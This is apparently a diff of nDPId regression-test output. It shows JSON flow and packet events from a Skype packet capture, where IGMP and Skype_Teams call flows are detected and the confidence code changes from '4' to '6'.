-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 
+00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":880,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970664698,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1431970664878,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970664878,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/kL8AAEARaq3AqAEib91NmjLdnFEAK0H5e2MCFDnpGlF82iGY4eNpUibWNoDaPXvzzVnf0YiL6zK2YSk="} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":881,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1431970664878,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970664878,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5Q+cAAEARHWrAqAEiQAQXlTLdnF4AJXN2e2UCDFA+Qxh89YvJZEs857N5H5uVs05hCuMkyAI="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":882,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970664878,"flow_last_seen":1431970664878,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970664878,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.149","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyYRMAAEARmlXAqAEib91NqzLdnF4AHu9ce2cCLa6FGK\/rw+WZJkTZL2SD2CNvhA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":893,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.171","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1sE4AAEARMsfAqAEinTc4oTLdnF8AITASe2kC9psOqbEN3IbEA34wiMcNZp24IiAl1w=="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":894,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1431970665893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970665893,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9lmMAAEARmbbAqAEinTfrlDLdnGEAKXtSe2sCw7Vy\/6hHK2XTagfLmixWAHOAd\/loE1p\/EyV7QPa1"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":895,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970665893,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00192{"error_event_id":5,"error_event_name":"Unknown packet 
type","datalink":1,"packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","layer_type":94,"global_ts_msec":1431970666370} 00417{"packet_event_id":1,"packet_event_name":"packet","packet_id":897,"source":"skype_no_unknown.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":100,"pkt_type":94,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":100,"pkt_l4_len":0,"thread_ts_msec":1431970666274,"pkt":"AQAMzMzMJKQ8\/kzXAF6qqgMAAAwgAAF4S2kAAQAOQWlyR2F0ZXdheQACABEAAAABAQHMAATAqAHbAAQACAAAAAIABQAQQWlyR1cudjEuMC4zAAYAB0FHVwADAAdicjAA\/wAFLg=="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666902,"flow_last_seen":1431970666902,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970666902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51255,"dst_port":40005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -515,10 +515,10 @@ 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfbxAAEAGcbnAqAEi1cezsMg6nFWOWkeEAAAAALAC\/\/9u6QAAAgQFtAEDAwUBAQgKPjIEMAAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fE8AAEARfyTAqAEib91NlTLdnFAAKVN0e20CYiNLpCtZKVRm5qzsJsm2qgqqm\/VHJHAXu9AEnz3Z"} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":903,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.149","src_port":13021,"dst_port":40016,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1431970666903,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970666903,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7vtoAAEARQB3AqAEib91KEzLdnEEAJxFYe28CrL8oxTm2+6Ol0c4xcn\/aCmr6scDIaqNamEoS7g=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":904,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970666903,"flow_last_seen":1431970666903,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970666903,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.19","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":2,"flow_last_seen":1431970666958,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666958,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93nVx7OwwKgBIpxVyDpdiXkDjlpHhaASOJCjtgAAAgQFrAQCCApO3n4vPjIEMAEDAwk="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":149,"flow_packet_id":3,"flow_last_seen":1431970666958,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970666958,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0TkBAAEAGoUHAqAEi1cezsMg6nFWOWkeFXYl5BIAQECz6qQAAAQEICj4yBGdO3n4v"} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":1431970666974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970666974,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+g+dN+uqwKgBIpxgyDkZrLIb0UAi+qASOJChgQAAAgQFrAQCCApMVm\/iPjIEMAEDAwk="} 
@@ -529,19 +529,19 @@ 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":927,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1431970667195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970667195,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KkFAAEAGkU3AqAEib91Njsg4nE30S7v4xRcL8IAQECxb2QAAAQEICj4yBU9NkBSe"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6bg8AAEARKxbAqAEinTeCjDLdnEsAJgsKe3ECMurpMuGdyMUwflNlvhyptKR18dfr99Rpa+D7"} 
-00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":937,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.140","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1431970667913,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970667913,"pkt":"0NQSxnP1PBXCt3IOCABFAABBDu8AAEARihTAqAEinTeCpzLdnF8ALeNce3MCnSaJe8js0\/W0uOkrjvFqVEozNuFXZVFpbX\/qiFWAThpduA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":938,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970667913,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.167","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 